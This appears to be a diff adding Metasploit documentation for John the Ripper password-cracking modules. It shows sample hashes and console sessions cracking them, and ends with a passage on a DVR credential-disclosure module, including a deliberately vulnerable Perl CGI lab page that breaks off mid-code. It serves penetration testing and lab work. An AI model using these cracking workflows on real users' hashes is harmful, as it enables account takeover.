+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] md5_password:password
+[*] Cracking descrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] des_password:password
+[*] Cracking bsdicrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] bsdi_password:password
+[*] Cracking crypt hashes in normal wordlist mode...
+Warning: hash encoding string length 20, type id #4
+appears to be unsupported on this system; will not load such hashes.
+Warning: hash encoding string length 60, type id $2
+appears to be unsupported on this system; will not load such hashes.
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] des_password:password
+[+] md5_password:password
+[+] sha256_password:password
+[+] sha512_password:password
+[*] Cracking bcrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] blowfish_password:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_linux) > creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                             realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
+                       bsdi_password      password                                                                                                   Password            
+                       des_password       password                                                                                                   Password            
+                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
+                       md5_password       password                                                                                                   Password            
+                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
+                       sha512_password    password                                                                                                   Password            
+                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
+                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
+                       sha256_password    password                                                                                                   Password            
+                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       blowfish_password  password                                                                                                   Password            
+
+```
@@ -0,0 +1,152 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
+  SQL based password hashes, such as:
+
+  * `mssql` based passwords
+  * `mssql05` based passwords
+  * `mssql12` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
+creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
+creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_mssql_fast 
+msf5 auxiliary(analyze/jtr_mssql_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
+[*] Cracking mssql05 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[*] Cracking mssql hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql_foo:FOO
+[+] mssql_foo:FOO
+[*] Cracking mssql12 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql12_Password1!:Password1!
+[+] mssql12_Password1!:Password1!
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_mssql_fast) > creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
+                       mssql05_toto        toto                                                                                                                                                   Password            
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
+                       mssql_foo           FOO                                                                                                                                                    Password            
+                       mssql_foo           foo                                                                                                                                                    Password            
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
+                       mssql12_Password1!  Password1!                                                                                                                                             Password            
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
+
+```
@@ -0,0 +1,134 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
+  based password hashes, such as:
+
+  * `mysql` (pre 4.1) based passwords
+  * `mysql-sha1` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
+creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_mysql_fast 
+msf5 auxiliary(analyze/jtr_mysql_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
+[*] Cracking mysql hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mysql_probe:probe
+[*] Cracking mysql-sha1 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mysql-sha1_tere:tere
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_mysql_fast) > creds
+Credentials
+===========
+
+host  origin  service  public           private                                    realm  private_type        JtR Format
+----  ------  -------  ------           -------                                    -----  ------------        ----------
+                       mysql_probe      probe                                             Password            
+                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
+                       mysql-sha1_tere  tere                                              Password            
+                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
+
+```
@@ -0,0 +1,163 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
+  based password hashes, such as:
+
+  * `oracle` (<=10) aka `des` based passwords
+  * `oracle11` based passwords
+  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
+  * `oracle12c` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  For a detailed explanation of Oracle 11/12c formats, see
+  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
+
+  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
+  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
+
+## Verification Steps
+
+  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
+creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
+creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_oracle_fast 
+msf5 auxiliary(analyze/jtr_oracle_fast) > run
+
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
+[*] Cracking oracle hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] simon:A
+[+] SYSTEM:THALES
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
+[*] Cracking dynamic_1506 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
+[*] Cracking oracle11 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] DEMO:epsilon
+[+] oracle11_epsilon:epsilon
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
+[*] Cracking oracle12c hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] oracle12c_epsilon:epsilon
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_oracle_fast) > creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       simon              A                                                                                                                                                                                                                                                                            Password            
+                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
+                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+
+```
@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
+  based password hashes, such as:
+
+  * `postgres` based passwords
+  * `raw-md5` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
+  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
+
+## Verification Steps
+
+  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_postgres_fast 
+msf5 auxiliary(analyze/jtr_postgres_fast) > run
+
+[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
+[*] Cracking dynamic_1034 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] example:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_postgres_fast) > creds
+Credentials
+===========
+
+host  origin  service  public   private                              realm  private_type  JtR Format
+----  ------  -------  ------   -------                              -----  ------------  ----------
+                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
+                       example  password                                    Password      
+
+```
@@ -0,0 +1,153 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
+  based password hashes, such as:
+
+  * `LM`, or `LANMAN` based passwords
+  * `NT`, `NTLM`, or `NTLANMAN` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `nt` or `lm` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
+creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_windows_fast 
+msf5 auxiliary(analyze/jtr_windows_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
+[*] Cracking lm hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
+Session completed
+[*] Cracking lm hashes in single mode...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
+Session completed
+[*] Cracking lm hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
+Session completed
+[*] Cracked Passwords this run:
+[+] lm_password:password
+[*] Cracking nt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] lm_password:password
+[+] nt_password:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_windows_fast) > creds
+Credentials
+===========
+
+host  origin  service  public       private                                                            realm  private_type  JtR Format
+----  ------  -------  ------       -------                                                            -----  ------------  ----------
+                       lm_password  password                                                                  Password      
+                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       nt_password  password                                                                  Password      
+                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+
+```
@@ -0,0 +1,76 @@
+## Description
+
+C2S DVR allows an unauthenticated user to disclose the username
+& password by requesting the javascript page 'read.cgi?page=2'.
+This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
+
+## Vulnerable Application
+
+This module has been verified against the mock vulnerable page listed below.
+
+### Mock Vulnerable Page
+
+These instructions will create a cgi environment and a vulnerable perl application for exploitation.
+Kali rolling (2019.1) was utilized for this tutorial, with apache.
+
+#### Setup
+
+1. Enable cgi: `a2enmod cgid`
+2. `mkdir /var/www/html/cgi-bin`
+3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
+4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/read.cgi`:
+
+```
+#!/usr/bin/perl
+use CGI qw(:standard);
+$query = new CGI;
+print $query->header( -type=> "text/javascript"),
+$query->import_names( 'Q' );
+
+my $data = <<'DATA';
+var pw_enflag = "1";
+var pw_adminpw = "12345";
+var pw_retype1 = "12345";
+var pw_userpw = "56789";
